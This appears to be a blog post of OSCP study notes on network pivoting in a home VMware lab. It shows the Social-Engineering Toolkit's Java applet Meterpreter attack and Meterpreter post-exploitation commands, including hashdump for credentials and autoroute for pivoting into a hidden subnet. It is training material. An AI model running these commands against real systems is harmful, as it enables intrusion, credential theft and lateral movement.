• OSCP Security Technology Pivoting


    OSCP Security Technology - Pivoting

    Configure vmware - Virtual Network Editor

    image-20211205205320381

    image-20211205205410782

    Set Kali, Windows 7 and Kioptrix virtual machines

    Kali Linux - VMnet7 (Host-only)

    image-20211205205840807

    ​ IP - 10.1.10.129

    image-20211227110733790

    Windows 7 - VMnet7 (Host-only) & NAT

    image-20211205210306503

    ​ IP 1 - 10.1.10.128

    ​ IP 2 - 192.168.134.128

    image-20211227111145475

    Kioptrix - NAT

    image-20211205210505295

    ​ IP - ????

    Win 7 VM can talk with Kali and Kioptrix, but Kali can not talk with Kioptrix directly.

    Set Java security -exception site list on Win 7.

    image-20211227124537191

    Start SE Toolkit on Kali.
    sudo setoolkit
    1 - Social-Engineering Attacks
    2 - Website Attack Vectors
    1 - Java Applet Attack Method
    1 - Web Templates
    

    image-20211227130123310

    1 - Meterpreter Memory Injection (Default)
    

    image-20211227130747275

    SET Web Server is now listening ..

    image-20211227130931442

    Browser http://10.1.10.129 through Win 7.

    image-20211227133231519

    Failed to establish an active session this time.

    If we succeed...

    run autoroute -p
    
    hashdump
    ipconfig
    arp -a 
    netstat -ano
    route
    run autoroute -s 192.168.134.0/24
    run autoroute -p 
    

    image-20211227134135749

    Exploit by MSF

    image-20211227134558613

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    java注释
    Java程序的编译与运行
    java 变量-数据类型转换
    java 基本数据类型之四类八种
    编写并解释第一个java程序
    java 基础知识(配置环境变量)
    常用DOS 命令
    java安装文件简介
    mysql权限问题
    vim 文本编辑器
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/15735956.html
Copyright © 2020-2023  润新知